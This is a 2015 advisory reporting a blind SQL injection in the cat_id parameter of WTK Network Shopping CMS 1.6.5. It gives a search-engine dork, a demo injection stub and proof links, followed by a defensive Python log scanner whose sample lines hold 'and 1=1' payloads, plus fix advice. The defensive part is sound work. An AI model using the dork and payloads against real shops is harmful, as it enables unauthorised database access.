WTK Network Shopping CMS version 1.6.5 suffers from a remote blind SQL injection vulnerability.
ccea99707df987dab4877138c65379cdb3e9108b4ff185e31d8e41c0d5248345
[*] Exploit Title: WTK Network SQL Injection Vulnerability
[*] Google Dork: allinurl: "product.php?cat_id="
[*] Date: April 11, 2015
[*] Exploit Author: ali ahmady From Iran
[*] Vendor Homepage: http://wtksoftware.com/
[*] Software Link: http://wtksoftware.com/clients/cart.php
[*] Version: 1.6.5
[*] Tested on: Linux
[*] demo : http://wtkdemo.com/unilevel_165_demo1/product.php?cat_id=1 AnD (true or false here)
WTK Network Shopping CMS suffers from a blind SQL injection vulnerability in the cat_id parameter of product.php:
site.com/path/product.php?cat_id=BSQLi
proof: http://i.cubeupload.com/qQrf6D.png
http://i.cubeupload.com/hsQ70A.png
Greets : VIRkid, Phantom_x, b0x
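
A defender-side check for the pattern above, added here as an example and not part of the original advisory: it scans web access logs for requests to product.php whose cat_id is not a plain integer after URL decoding, and keeps the response size so true/false response differences stand out. The combined log format, the /shop/ path, the sample lines, the function names and the assumption that cat_id is always a numeric category id are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed sample access-log lines (combined log format, documentation IP ranges).
SAMPLE_LOG = """\
192.0.2.10 - - [11/Apr/2015:10:00:01 +0000] "GET /shop/product.php?cat_id=1 HTTP/1.1" 200 5120
192.0.2.44 - - [11/Apr/2015:10:00:07 +0000] "GET /shop/product.php?cat_id=1%20AnD%201=1 HTTP/1.1" 200 5120
192.0.2.44 - - [11/Apr/2015:10:00:08 +0000] "GET /shop/product.php?cat_id=1+and+1%3D2 HTTP/1.1" 200 812
192.0.2.44 - - [11/Apr/2015:10:00:09 +0000] "GET /shop/product.php?cat_id=1%2520and%25201%253D1 HTTP/1.1" 200 5120
192.0.2.10 - - [11/Apr/2015:10:00:12 +0000] "GET /shop/index.php?page=2 HTTP/1.1" 200 900
192.0.2.10 - - [11/Apr/2015:10:00:15 +0000] "GET /shop/product.php?cat_id=27&sort=price HTTP/1.1" 200 4300
"""

# client, request target, status, response size
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3}) (\d+|-)')

def fully_decode(value, rounds=3):
    """Undo nested URL encoding (e.g. %2520) so the check sees the final string."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_cat_id_requests(log_text):
    """Return (client, decoded cat_id, status, size) for every non-integer cat_id."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, status, size = m.groups()
        parts = urlsplit(target)
        if not parts.path.lower().endswith("/product.php"):
            continue
        # parse_qs decodes once; fully_decode handles additional encoding layers.
        for raw in parse_qs(parts.query, keep_blank_values=True).get("cat_id", []):
            value = fully_decode(raw)
            if not re.fullmatch(r"\d{1,10}", value):
                hits.append((client, value, int(status), int(size) if size.isdigit() else 0))
    return hits

if __name__ == "__main__":
    for hit in suspicious_cat_id_requests(SAMPLE_LOG):
        print(hit)
```

The same integer-only rule is the application-side fix: reject or cast cat_id before it reaches the query, and bind it as a parameter rather than concatenating it.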